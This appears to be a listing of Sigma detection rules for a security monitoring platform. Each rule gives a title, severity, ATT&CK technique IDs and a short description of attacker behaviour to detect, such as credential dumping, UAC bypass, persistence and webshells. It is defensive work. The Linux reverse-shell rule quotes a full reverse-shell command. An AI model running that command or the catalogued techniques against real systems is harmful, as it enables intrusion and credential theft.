Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.
PUA - DefenderCheck Execution
sigma high
T1027.005
imProcessCreate
Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and t
T1204.002
imProcessCreate
Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)
Suspicious Outlook Child Process
sigma high
T1204.002
imProcessCreate
Detects a suspicious process spawning from an Outlook process.
T1685
imProcessCreate
Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData.
Potential AMSI Bypass Via .NET Reflection
sigma high
T1685
imProcessCreate
Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning
T1127
imProcessCreate
Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks.
T1053.005T1059.001
imProcessCreate
Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a s
Potential Process Injection Via Msra.EXE
sigma high
T1055
imProcessCreate
Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many thre
Potential Renamed Rundll32 Execution
sigma high
imProcessCreate
Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection
Renamed Jusched.EXE Execution
sigma high
T1036.003
imProcessCreate
Detects the execution of a renamed "jusched.exe" as seen used by the cobalt group
Renamed Remote Utilities RAT (RURAT) Execution
sigma medium
imProcessCreate
Detects execution of renamed Remote Utilities (RURAT) via Product PE header field
T1218.001
imProcessCreate
Detects the execution of malicious OneNote documents that contain embedded scripts. When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and exe
T1003
imProcessCreate
Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
Java Running with Remote Debugging
sigma medium
T1203
imProcessCreate
Detects a JAVA process running with remote debugging allowing more than just localhost to connect
Copy Passwd Or Shadow From TMP Path
sigma high
T1552.001
imProcessCreate
Detects when the file "passwd" or "shadow" is copied from tmp path
T1685
imProcessCreate
Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV
T1059.001T1027T1620
imProcessCreate
Detects base64 encoded .NET reflective loading of Assembly
Potential RDP Tunneling Via Plink
sigma high
T1572
imProcessCreate
Execution of plink to perform data exfiltration and tunneling
Base64 Encoded PowerShell Command Detected
sigma high
T1027T1140T1059.001
imProcessCreate
Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string
T1564.002
imRegistry
Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being l
Enable BPF Kprobes Tracing
sigma medium
imProcessCreate
Detects common command used to enable bpf kprobes tracing
Potential RDP Tunneling Via SSH
sigma high
T1572
imProcessCreate
Execution of ssh.exe to perform data exfiltration and tunneling through RDP
Terminal Service Process Spawn
sigma high
T1190T1210
imProcessCreate
Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)
Suspicious IIS Module Registration
sigma high
T1505.004
imProcessCreate
Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors
imProcessCreate
Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)
Atbroker Registry Change
sigma medium
T1218T1547
imRegistry
Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'
Java Payload Strings
sigma high
T1190
imWebSession
Detects possible Java payloads in web access logs
Query Usage To Exfil Data
sigma medium
imProcessCreate
Detects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use
Raw Paste Service Access
sigma high
T1071.001T1102.001T1102.003
imWebSession
Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form
SQLite Chromium Profile Data DB Access
sigma high
T1539T1555.003T1005
imProcessCreate
Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.
SQLite Firefox Profile Data DB Access
sigma high
T1539T1005
imProcessCreate
Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.
Flush Iptables Ufw Chain
sigma medium
T1562.004
imProcessCreate
Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic
Ufw Force Stop Using Ufw-Init
sigma medium
T1562.004
imProcessCreate
Detects attempts to force stop the ufw using ufw-init
T1049
imProcessCreate
Detects usage of system utilities to discover system network connections
T1553.004
imProcessCreate
Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
Mount Execution With Hidepid Parameter
sigma medium
T1564
imProcessCreate
Detects execution of the "mount" command with "hidepid" parameter to make invisible processes to other users from the system
imProcessCreate
Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine
Touch Suspicious Service File
sigma medium
T1070.006
imProcessCreate
Detects usage of the "touch" process in service file.
T1059.001
imProcessCreate
Detects powershell scripts that import modules from suspicious directories
T1055.001
imProcessCreate
Detects potential DLL injection and execution using "Tracker.exe"
PowerShell SAM Copy
sigma high
T1003.002
imProcessCreate
Detects suspicious PowerShell scripts accessing SAM hives
VsCode Powershell Profile Modification
sigma medium
T1546.013
imFileEvent
Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
NTDS.DIT Creation By Uncommon Parent Process
sigma high
T1003.003
imFileEvent
Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory
Potential RipZip Attack on Startup Folder
sigma high
T1547
imFileEvent
Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP fil
Potential SAM Database Dump
sigma high
T1003.002
imFileEvent
Detects the creation of files that look like exports of the local SAM (Security Account Manager)
Potential Winnti Dropper Activity
sigma high
T1027
imFileEvent
Detects files dropped by Winnti as described in RedMimicry Winnti playbook
PowerShell Get-Process LSASS
sigma high
T1552.004
imProcessCreate
Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity
Suspicious Creation with Colorcpl
sigma high
T1564
imFileEvent
Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\
Suspicious Execution of Powershell with Base64
sigma medium
T1059.001
imProcessCreate
Commandline to launch powershell with a base64 payload
Suspicious Git Clone - Linux
sigma medium
T1593.003
imProcessCreate
Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
Suspicious PowerShell Invocation From Script Engines
sigma medium
T1059.001
imProcessCreate
Detects suspicious powershell invocations from interpreters or unusual programs
imProcessCreate
Detects suspicious PowerShell invocation command parameters
Potential PowerShell Downgrade Attack
sigma medium
T1059.001
imProcessCreate
Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
Use of Pcalua For Execution
sigma medium
T1059
imProcessCreate
Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.
Linux Doas Conf File Creation
sigma medium
T1548
imFileEvent
Detects the creation of doas.conf file in linux host platform.
Persistence Via Cron Files
sigma medium
T1053.003
imFileEvent
Detects creation of cron file or files in Cron directories which could indicates potential persistence.
Persistence Via Sudoers Files
sigma medium
T1053.003
imFileEvent
Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user.
Potential DLL Sideloading Using Coregen.exe
sigma medium
T1218T1055
DeviceImageLoadEvents
Detect usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.
Suspicious Diantz Alternate Data Stream Execution
sigma medium
T1564.004
imProcessCreate
Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
Triple Cross eBPF Rootkit Default LockFile
sigma high
imFileEvent
Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.
T1053.003
imFileEvent
Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method
Change the Fax Dll
sigma high
T1112
imRegistry
Detect possible persistence using Fax DLL load when service restart
T1112
imRegistry
Detect change of the user account associated with the FAX service to avoid the escalation problem.
T1490
imProcessCreate
Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil
Exchange PowerShell Cmdlet History Deleted
sigma high
T1070
imFileEvent
Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence
Suspicious Extrac32 Alternate Data Stream Execution
sigma medium
T1564.004
imProcessCreate
Extract data from cab file and hide it in an alternate data stream
Suspicious Usage Of ShellExec_RunDLL
sigma high
imProcessCreate
Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack
imProcessCreate
Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity
Invoke-Obfuscation COMPRESS OBFUSCATION
sigma medium
T1027T1059.001
imProcessCreate
Detects Obfuscated Powershell via COMPRESS OBFUSCATION
Lolbin Runexehelper Use As Proxy
sigma medium
T1218
imProcessCreate
Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs
imProcessCreate
Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install
Linux Webshell Indicators
sigma high
T1505.003
imProcessCreate
Detects suspicious sub processes of web server processes
Potential Discovery Activity Using Find - Linux
sigma medium
T1083
imProcessCreate
Detects usage of "find" binary in a suspicious manner to perform discovery
Group Has Been Deleted Via Groupdel
sigma medium
T1531
imProcessCreate
Detects execution of the "groupdel" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks
User Has Been Deleted Via Userdel
sigma medium
T1531
imProcessCreate
Detects execution of the "userdel" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks
T1560.001
imProcessCreate
An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
Enumeration for Credentials in Registry
sigma medium
T1552.002
imProcessCreate
Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Ad
Esentutl Volume Shadow Copy Service Keys
sigma high
T1003.002
imRegistry
Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured.
Execution via stordiag.exe
sigma high
T1218
imProcessCreate
Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe
Execution via WorkFolders.exe
sigma high
T1218
imProcessCreate
Detects using WorkFolders.exe to execute an arbitrary control.exe
JNDIExploit Pattern
sigma high
T1190
imWebSession
Detects exploitation attempt using the JNDI-Exploit-Kit
Linux Crypto Mining Indicators
sigma high
T1496
imProcessCreate
Detects command line parameters or strings often used by crypto miners
Linux Reverse Shell Indicator
sigma critical
T1059.004
imNetworkSession
Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
New DLL Added to AppInit_DLLs Registry Key
sigma medium
T1546.010
imRegistry
DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll
T1105
imProcessCreate
Detects usage of COM objects that can be abused to download files in PowerShell by CLSID
PowerShell Get-Clipboard Cmdlet Via CLI
sigma medium
T1115
imProcessCreate
Detects usage of the 'Get-Clipboard' cmdlet via CLI
Powershell Inline Execution From A File
sigma medium
T1059.001
imProcessCreate
Detects inline execution of PowerShell code from a file
Suspicious Splwow64 Without Params
sigma high
T1202
imProcessCreate
Detects suspicious Splwow64.exe process without any command line parameters
Suspicious ZipExec Execution
sigma medium
T1218T1202
imProcessCreate
ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.
Tasks Folder Evasion
sigma high
T1574.001
imProcessCreate
The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execut
UAC Bypass With Fake DLL
sigma high
T1548.002T1574.001
DeviceImageLoadEvents
Attempts to load dismcore.dll after dropping it
WhoAmI as Parameter
sigma high
T1033
imProcessCreate
Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)
Browser Started with Remote Debugging
sigma medium
T1185
imProcessCreate
Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks
T1185T1564.003
imProcessCreate
Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control
T1132.001
imProcessCreate
Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.
Suspicious X509Enrollment - Process Creation
sigma medium
T1553.004
imProcessCreate
Detect use of X509Enrollment
User Added To Root/Sudoers Group Using Usermod
sigma medium
imProcessCreate
Detects usage of the "usermod" binary to add users add users to the root or suoders groups
T1112T1562
imRegistry
Potential adversaries stopping ETW providers recording loaded .NET assemblies.
T1003.001
imRegistry
Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process
Potential DLL Sideloading Via comctl32.dll
sigma high
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading using comctl32.dll to obtain system privileges
Potential Persistence Attempt Via ErrorHandler.Cmd
sigma medium
imFileEvent
Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd
imFileEvent
Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"
Potential DCOM InternetExplorer.Application DLL Hijack
sigma critical
T1021.002T1021.003
imFileEvent
Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network
T1021.002T1021.003
DeviceImageLoadEvents
Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class
Execution Of Non-Existing File
sigma high
imProcessCreate
Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)
Potential DLL Sideloading Via JsSchHlp
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor
T1105
imProcessCreate
Detects usage of the "type" command to download/upload data from WebDAV server
Potential DLL Sideloading Via ClassicExplorer32.dll
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software
T1112
imProcessCreate
This rule detects the execution of Run Once task as configured in the registry
T1685
imProcessCreate
Detects changes to environment variables related to ETW logging via the CommandLine. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.
T1003.001
imFileEvent
Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Err
T1547
imRegistry
Detects persistence registry keys for Recycle Bin
Mavinject Inject DLL Into Running Process
sigma high
T1055.001T1218.013
imProcessCreate
Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag
imProcessCreate
Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
imProcessCreate
Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
imProcessCreate
Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
imProcessCreate
Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
Adwind RAT / JRAT File Artifact
sigma high
T1059.005T1059.007
imFileEvent
Detects javaw.exe in AppData folder as used by Adwind / JRAT
Time Travel Debugging Utility Usage - Image
sigma high
T1218T1003.001
DeviceImageLoadEvents
Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
Wmiprvse Wbemcomn DLL Hijack - File
sigma critical
T1047T1021.002
imFileEvent
Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
WScript or CScript Dropper - File
sigma high
T1059.005T1059.007
imFileEvent
Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe
DLL Sideloading Of ShellChromeAPI.DLL
sigma high
T1574.001
DeviceImageLoadEvents
Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. Adversaries can d
Advanced IP Scanner - File Event
sigma medium
T1046
imFileEvent
Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
WMI Persistence - Security
sigma medium
T1546.003
imRegistry
Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.
T1216
imFileEvent
Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)
Suspicious PowerShell IEX Execution Patterns
sigma high
T1059.001
imProcessCreate
Detects suspicious ways to run Invoke-Execution using IEX alias
T1608
imRegistry
Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.
Scheduled Cron Task/Job - Linux
sigma medium
T1053.003
imProcessCreate
Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
Security Software Discovery - Linux
sigma low
T1518.001
imProcessCreate
Detects usage of system utilities (only grep and egrep for now) to discover security software discovery
RDP Sensitive Settings Changed to Zero
sigma medium
T1112
imRegistry
Detects tampering of RDP Terminal Service/Server sensitive settings. Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
Sticky Key Like Backdoor Usage - Registry
sigma critical
T1546.008
imRegistry
Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
Suspicious PROCEXP152.sys File Created In TMP
sigma medium
T1562.001
imFileEvent
Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) o
UAC Bypass Using Event Viewer RecentViews
sigma high
imProcessCreate
Detects the pattern of UAC Bypass using Event Viewer RecentViews
UAC Bypass Using EventVwr
sigma high
imFileEvent
Detects the pattern of a UAC bypass using Windows Event Viewer
Suspicious Recursive Takeown
sigma medium
T1222.001
imProcessCreate
Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders
Suspicious Modification Of Scheduled Tasks
sigma high
T1053.005
imProcessCreate
Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location Attackers can create a simple looking task in order to avoid detection on creation as it'
Suspicious New Service Creation
sigma high
T1543.003
imProcessCreate
Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths
Suspicious Service Path Modification
sigma high
T1543.003
imProcessCreate
Detects service path modification via the "sc" binary to a suspicious command or path
Windows Webshell Strings
sigma high
T1505.003
imWebSession
Detects common commands used in Windows webshells
Invoke-Obfuscation CLIP+ Launcher
sigma high
T1027T1059.001
imProcessCreate
Detects Obfuscated use of Clip.exe to execute PowerShell
T1027T1059.001
imProcessCreate
Detects Obfuscated Powershell via VAR++ LAUNCHER
Suspicious RunAs-Like Flag Combination
sigma medium
imProcessCreate
Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools
Suspicious Process Patterns NTDS.DIT Exfil
sigma high
T1003.003
imProcessCreate
Detects suspicious process patterns used in NTDS.DIT exfiltration
Use Of The SFTP.EXE Binary As A LOLBIN
sigma medium
T1218
imProcessCreate
Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag
Suspicious Screensaver Binary File Creation
sigma medium
T1546.002
imFileEvent
Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Po
T1567T1568.002T1572T1090T1102
imNetworkSession
Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors
Kavremover Dropped Binary LOLBIN Usage
sigma high
T1127
imProcessCreate
Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.
Suspicious Scheduled Task Name As GUID
sigma medium
T1053.005
imProcessCreate
Detects creation of a scheduled task with a GUID like name
Suspicious User Agent
sigma high
T1071.001
imWebSession
Detects suspicious malformed user agent strings in proxy logs
T1218
imProcessCreate
Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter
PsExec Service File Creation
sigma low
T1569.002
imFileEvent
Detects default PsExec service filename which indicates PsExec service installation and execution
Suspicious PowerShell Mailbox Export to Share
sigma critical
imProcessCreate
Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations
T1566T1566.001T1574T1574.001
imFileEvent
Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious mo
Rclone Activity via Proxy
sigma medium
T1567.002
imWebSession
Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string
WMIC Loading Scripting Libraries
sigma medium
T1220
DeviceImageLoadEvents
Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc). It could be a
WMI Persistence - Script Event Consumer
sigma medium
T1546.003
imProcessCreate
Detects WMI script event consumers
T1087.001
imProcessCreate
Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet
T1216
imProcessCreate
Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)
T1012
imRegistry
This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent. This detection requires an access control entry (ACE) on the s
Azure AD Health Service Agents Registry Keys Access
sigma medium
T1012
imRegistry
This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS). Information from AD Health servi
Detected Windows Software Discovery
sigma medium
T1518
imProcessCreate
Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerabl
Disabling Security Tools
sigma medium
T1562.004
imProcessCreate
Detects disabling security tools
Dropping Of Password Filter DLL
sigma medium
T1556.002
imProcessCreate
Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS
Esentutl Gather Credentials
sigma medium
T1003T1003.003
imProcessCreate
Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.
Execute From Alternate Data Streams
sigma medium
T1564.004
imProcessCreate
Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection
T1074.001
imProcessCreate
Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by m
InfDefaultInstall.exe .inf Execution
sigma medium
T1218
imProcessCreate
Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
T1218
imProcessCreate
There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger. This option may be used adversaries to execute malicious code by signed v
MSExchange Transport Agent Installation
sigma medium
T1505.002
imProcessCreate
Detects the Installation of a Exchange Transport Agent
NetNTLM Downgrade Attack
sigma high
T1562.001T1112
imRegistry
Detects NetNTLM downgrade attack
PCRE.NET Package Image Load
sigma high
T1059
DeviceImageLoadEvents
Detects processes loading modules related to PCRE.NET package
PCRE.NET Package Temp Files
sigma high
T1059
imFileEvent
Detects processes creating temp files related to PCRE.NET package
Raccine Uninstall
sigma high
T1685
imProcessCreate
Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.
Regedit as Trusted Installer
sigma high
T1548
imProcessCreate
Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe
Remote PowerShell Session Host Process (WinRM)
sigma medium
T1059.001T1021.006
imProcessCreate
Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).
Suspicious Camera and Microphone Access
sigma high
T1125T1123
imRegistry
Detects Processes accessing the camera and microphone from suspicious folder
Suspicious Driver Install by pnputil.exe
sigma medium
T1547
imProcessCreate
Detects when a possible suspicious driver is being installed via pnputil.exe lolbin
T1566.001
imProcessCreate
Detects a suspicious program execution in Outlook temp folder
T1059.006
imProcessCreate
Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe
Suspicious Plink Port Forwarding
sigma high
T1572T1021.001
imProcessCreate
Detects suspicious Plink tunnel port forwarding to a local port
T1218.011
imProcessCreate
Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452
Suspicious Rundll32 Invoking Inline VBScript
sigma high
T1055
imProcessCreate
Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452
T1053.005
imProcessCreate
Detects the creation of scheduled tasks that involves a temporary folder and runs only once
Suspicious Service Binary Directory
sigma high
T1202
imProcessCreate
Detects a service binary running in a suspicious directory
Time Travel Debugging Utility Usage
sigma high
T1218T1003.001
imProcessCreate
Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
T1548.002
imFileEvent
Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
UAC Bypass Using Consent and Comctl32 - File
sigma high
T1548.002
imFileEvent
Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
UAC Bypass Using IEInstal - File
sigma high
T1548.002
imFileEvent
Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
T1548.002
imFileEvent
Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
UAC Bypass Using .NET Code Profiler on MMC
sigma high
T1548.002
imFileEvent
Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)
UAC Bypass Using NTFS Reparse Point - File
sigma high
T1548.002
imFileEvent
Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
UAC Bypass Using Windows Media Player - File
sigma high
T1548.002
imFileEvent
Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
Wmiprvse Wbemcomn DLL Hijack
sigma high
T1047T1021.002
DeviceImageLoadEvents
Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
Connection Proxy
sigma low
T1090
imProcessCreate
Detects setting proxy configuration
OMIGOD SCX RunAsProvider ExecuteScript
sigma high
T1068T1190T1203
imProcessCreate
Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* pre
OMIGOD SCX RunAsProvider ExecuteShellCommand
sigma high
T1068T1190T1203
imProcessCreate
Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Ag
Setuid and Setgid
sigma low
T1548.001
imProcessCreate
Detects suspicious change of file privileges with chown and chmod commands
Silenttrinity Stager Msbuild Activity
sigma high
T1127.001
imNetworkSession
Detects a possible remote connections to Silenttrinity c2
Source Code Enumeration Detection by Keyword
sigma medium
T1083
imWebSession
Detects source code enumeration that use GET requests by keyword searches in URL strings
Suspicious File Drop by Exchange
sigma medium
T1190T1505.003
imFileEvent
Detects suspicious file type dropped by an Exchange component in IIS
Chopper Webshell Process Pattern
sigma high
T1505.003T1018T1033T1087
imProcessCreate
Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells
Suspicious ASPX File Drop by Exchange
sigma high
T1505.003
imFileEvent
Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder
Suspicious Execution of Shutdown to Log Out
sigma medium
T1529
imProcessCreate
Detects the rare use of the command line tool shutdown to logoff a user
Potential Remote Desktop Tunneling
sigma medium
T1021
imProcessCreate
Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended des
Remote File Download Via Desktopimgdownldr Utility
sigma medium
T1105
imProcessCreate
Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.
UAC Bypass via Windows Firewall Snap-In Hijack
sigma medium
T1548
imProcessCreate
Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in
Unusual File Modification by dns.exe
sigma high
T1133
imFileEvent
Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
Wab Execution From Non Default Location
sigma high
imProcessCreate
Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity
Wab/Wabmig Unusual Parent Or Child Processes
sigma high
imProcessCreate
Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity
Suspicious Outbound SMTP Connections
sigma medium
T1048.003
imNetworkSession
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network locat
Use NTFS Short Name in Command Line
sigma medium
T1564.004
imProcessCreate
Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection
T1528
imRegistry
Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.
